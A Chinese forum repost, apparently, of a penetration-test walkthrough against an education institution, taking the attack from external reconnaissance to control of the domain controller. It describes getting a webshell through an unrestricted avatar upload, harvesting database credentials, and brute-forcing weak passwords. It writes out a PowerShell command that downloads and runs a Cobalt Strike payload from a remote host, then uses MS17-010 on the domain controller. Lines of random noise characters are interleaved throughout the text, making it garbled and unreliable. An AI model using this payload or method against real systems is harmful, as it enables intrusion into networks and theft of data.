|
9 |0 ?9 Y7 g% v, q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
$ X! k( s+ ~" H- v0 J& _% _. k. F
% b) h6 P z' [1 b p# t
# d z/ B* l3 J* S. s5 R" h7 ]9 n
0 e$ [+ N! p/ p9 [' I" j7 T5 z ; M' X2 n# t$ J% k& G' ~, [6 U
; R e6 z1 Z; N3 N. t1 M
正文
1 b6 @! `) n c% t 0 U' s* u: N+ H2 B
) s4 N. D: p( h
' M# P2 @, P. U$ X4 p7 @+ _ ! q3 n% S& r! m1 U; l+ M
4 U/ Y( ^/ L, @* B7 q* C, l/ z
目标:www.xxxx.com(一家教育机构)
+ |2 A+ o$ ?9 Y& _7 p) ^$ P+ y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
9 U! ^3 @7 |8 G! [0 Q: s 9 x- B+ B0 d$ I* c; v: B
. i( v/ ?7 c% V  - i7 H3 p$ }! C5 L0 ?
) f9 ^/ X. v$ m7 Q1 V
% `( m' v7 _5 ^) M8 z0 B
进行了简单的信息搜集
2 g) G/ x7 d; \8 a
1 }8 ?+ ~( d/ Q/ Q
7 S+ p; \& y! M8 F+ v * Y2 L1 z) V0 u9 s( z7 g7 J0 S
# i* e! A5 s) R: j- S
子域名搜集- ?1 X: N3 O7 y5 G$ [6 B
7 e# ~3 l( d: r. u
) L' q+ n7 q8 k! u( q3 ~ 
+ p4 o4 i4 c. b1 y 0 A5 t$ g4 \. U' S$ L9 g
1 H m3 w- |: v5 `6 A8 k fofa找资产
/ ^3 _* l3 k+ q, E. `
. y4 l6 i+ J9 S! |7 O7 N' W: ^
1 _% y2 @% C% z3 D$ s0 r( ?. q
* {& j" D9 v4 ^% U/ a
$ w7 N, P1 u: U2 Y8 i/ U6 ]* D* N 
0 V$ V0 X' f5 S+ ^
, @+ z; n7 R S) s& A, k
$ L- s. T7 _8 {6 \' k; t( x 一共七个资产。去重之后只有两个。
& h7 Z" Y; D5 e
8 c3 ^3 h0 t% k) K, n( ~/ x9 [2 N% d2 o" Z
3 p& N) y0 w9 j/ ?2 }
$ `! v( G6 p7 Q" H# L% i) d+ E3 M 目录探测4 [' X; s8 a! e' Y2 S; W- g
& H6 G8 L2 G, W# q6 o, r
$ w! o5 m0 U. f3 @! L* g  $ s) Q( ~0 h- |; J* G$ c
w5 K9 M9 B+ k! E$ l. I3 Z# F. S! k, y" X" ^
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 h: S' U" p) c: k& k
9 A* {0 |% l: A4 m5 C& c4 I' @
0 j$ ?# {9 w, o9 { ' L% [- Z+ I5 P9 R4 ]' H) Q% D
* ~" @$ L* h, X6 H* Z2 }0 h
我又尝试了通过修改返回包来绕过登录界面9 |' w, i- [/ h) w8 v" J! v
, W1 D- V9 \! l- w$ c3 S' T# |$ X
, M, `- J) }* {" E+ \, A) v1 o
1 b! z+ j& U% x. g* V 2 ~* H9 ^- K8 s4 d/ f2 i2 y Z
) i( o8 s% k) L
还是不行,尝试注入无果) y' B. } n4 [6 O! k
. w1 G+ _/ i. z& V, p& m. j( {9 O1 }. X) }) n8 T4 a
+ ^5 a5 A" p. U) P3 @4 B 2 Z* S5 I6 h# I T& h4 A
7 W. `' J) {! ?" M: ]+ O6 n
不过我目录探测出了一处Spring信息泄露
0 ?" p" c8 P4 z; _( C" I
7 O5 Q: u+ V9 c
1 D& ~% \3 F$ f- y: |
9 p! Z3 a+ w: i% \" e2 D% s+ |* g" X0 P: A5 W. M" `
 , [) a7 X; E: k
0 [ V3 B/ U( w4 q9 m+ l! R& q" H2 ^2 i2 e3 t% n! ]
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
! t1 U$ K \( n 4 G; D) N. X0 {
^5 v5 E( N* t8 B/ L  ! `9 K# V$ R0 p. ~6 @5 c2 j
5 \& P; M" M5 `* {2 T
% s! e- U+ v2 Y6 i1 Q 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& ]% u7 z s/ ^* ]$ u- }/ X b
0 a4 Z) F M5 R& S" L
. o$ E6 U, F# d3 Q7 T* L
 0 _$ H: H. ~0 l- v- Q( W/ j
3 }! z7 h0 Y$ t& W+ s/ ]7 g* ~6 ]' }4 V* ]
获取有些师傅到这一步就手机抓包电脑测了。
! ~' W- K0 @ a& }( S: a9 ^ " E* p: e5 n/ ]* h5 E
( \$ k" z% R- `" b
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
?3 {1 ]$ ^3 @; A+ P1 U. f 3 |3 |0 X3 e+ u" U1 p% r- K
& q* I# c6 E2 ]; K2 z8 O1 P
其中在一个公众号发现了小程序,可以进行注册。$ e% Y. |: o) x: D0 D8 P: _
2 l, c6 W5 p, I8 p
- ]+ {% f+ A$ M# M. G& Y# r7 E 看到了头像上传,尝试上传获取WebShell1 p% Q; @. N' p9 _2 H+ |
+ w4 w) y( `2 P$ {6 M' k& _ @
7 G7 E: Q$ l( V# ~% p3 e  ! x' \& a0 p z1 }
- ?7 \ b. a. X: f7 B4 K$ b* v0 j8 ^- g3 g6 I
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
: g) C/ }# F, l. {. n _, X
2 ]% C- ]- v3 ~9 D7 X, a
. b; s3 ~2 ]# [1 V7 f5 @ 
% c! c4 l' ?( k2 g/ h 0 B9 x6 h0 g: E% K; ~
" ~4 { m4 x6 [1 X$ F
然后上了大马
: B/ g3 v4 Y# u# i {* H$ R
2 L8 Z& B) i I/ S6 z4 M
- ]4 P% w t9 t& g7 O  * N2 R8 W% R1 X5 B
* C7 ]1 H" H7 F
7 s. T* u$ I- d" p1 {, h: D8 \  % h% T) _/ A( ~% i- \) v7 p
2 ]& n8 v8 \ X) A4 U5 T* n4 S. i; s6 @% h
通过翻找文件发现数据库账号密码
+ J6 N4 u8 |6 B6 _% N( |* Q6 B 7 Q: m, m: a, E, i: r
2 R1 Y. N- N$ W 
7 W' u, p% P/ B3 u1 P0 L. V
! V' Q0 c/ {: }0 B) [/ b9 v' R" z1 P
--内网渗透
$ |9 h$ c* h8 E) |* U7 | F0 f* o5 r- c6 j
- D8 R- v1 K1 Z! ] 直接通过powershell执行 cs上线% v% j1 |$ Q/ }* ]! j0 L
: o* ?: B9 S; W
9 | b G3 ~% C1 ]( A7 \+ E' [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
- a2 H* Z, _ m$ t' p
. X* M4 c; o5 G Z- B1 O5 }6 C
* M2 p' f1 j- t \, t2 S  - V& k+ C/ s, r5 @% }; Z
' u) Z2 K& T1 W+ Z t& d
% ]: x0 ?, k. @- W$ N f; [: ?9 V 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破9 I& V4 o, O9 k, o3 R
9 i; E) Y. D+ h+ V) f3 h" W2 r
0 ]9 J/ h: t9 Q2 F8 `
: V" } ]0 p0 G( F2 _5 H* [ - D1 W8 t" E5 M, v8 y
) }) K- S( m" h; Q6 K
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: u( Y0 f& R+ j, o" b8 p
4 `3 K. P2 E) L |4 d: H1 Q1 q* a6 `/ K
7 m8 f5 W% h' \! ?* w
5 W5 l3 u/ d6 U
9 K* @5 d( j9 d3 v9 A$ d, _+ z
5 [ z+ X0 q/ Y3 a  ! N4 {+ b/ F# q* H: e% i5 `& Z% E# u5 l
- p& j( r, m7 Z+ y% b
: q/ }' [. J, h+ I 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ }: U. s3 O1 m. u1 Q7 c4 M
6 U D3 l3 c! M9 f
- N7 B: _+ ?/ U5 V7 c1 y
6 m) l* z. R2 `3 \& f) @5 u: t) ~! X) Z* b* s( S
 , c2 C7 K$ H' O8 B* k# C
" H- z. D/ K" A7 I6 i5 i* I0 b
# D1 c. \& t: @- C+ a$ W" w
: H* }) x. e2 ]1 ^
7 ^7 i- a6 n5 c5 N S* c8 [8 V; }; t$ O! x8 D
; G- ^$ w' {/ x+ {. O% n# x& Q, F D8 K9 _4 v6 V+ ~
9 ~: T3 P6 D* F6 j5 |) U% i4 s) Z0 n% P, D
4 _1 Q6 {+ Z( j6 i2 d. |
x( ?8 W2 F" E4 g) C( f
小结
% Y3 V4 N9 P( t) t/ Y9 X ! q4 D* U: Y1 L& i. B
+ ~0 o, b! s ?6 S8 M( r" P
$ C( z: B* @: R: r. ]+ j5 {
* N0 N9 D+ c- W! j
& O7 ~0 }+ P; i8 S+ W* _4 w+ l 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
1 }9 i, M+ l0 n9 f ]$ i % i$ M# O- S( f6 w% J
v, w6 t& z9 Y+ \; ]& B6 Z% x. m
% U# E! b% u* H& ^3 \' Y' d
2 } x1 f: H2 P3 \5 T: u7 S" c5 W7 V5 u, ^
- 7 u% {: |& C( @7 C5 J
4 q5 z4 w/ h- x( \ Q
7 M) |- m) ]2 P
-
% g" ~6 g* Q1 C# v2 B
, F. R0 F( l0 q& U x
G+ ~9 D1 }& N) }: Y# _) I1 R* X
, P5 A4 G5 E( B1 B
1 n: x0 c f9 N
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html, O5 H+ Q. F8 h) r; E* ]
9 M h9 `( i e/ i" I( e& b3 h# N. s7 Z# l# i. T
, I* c( o" ~6 m( J/ ^6 w | 
发表于 2024-3-1 19:41:32
收藏
支持
反对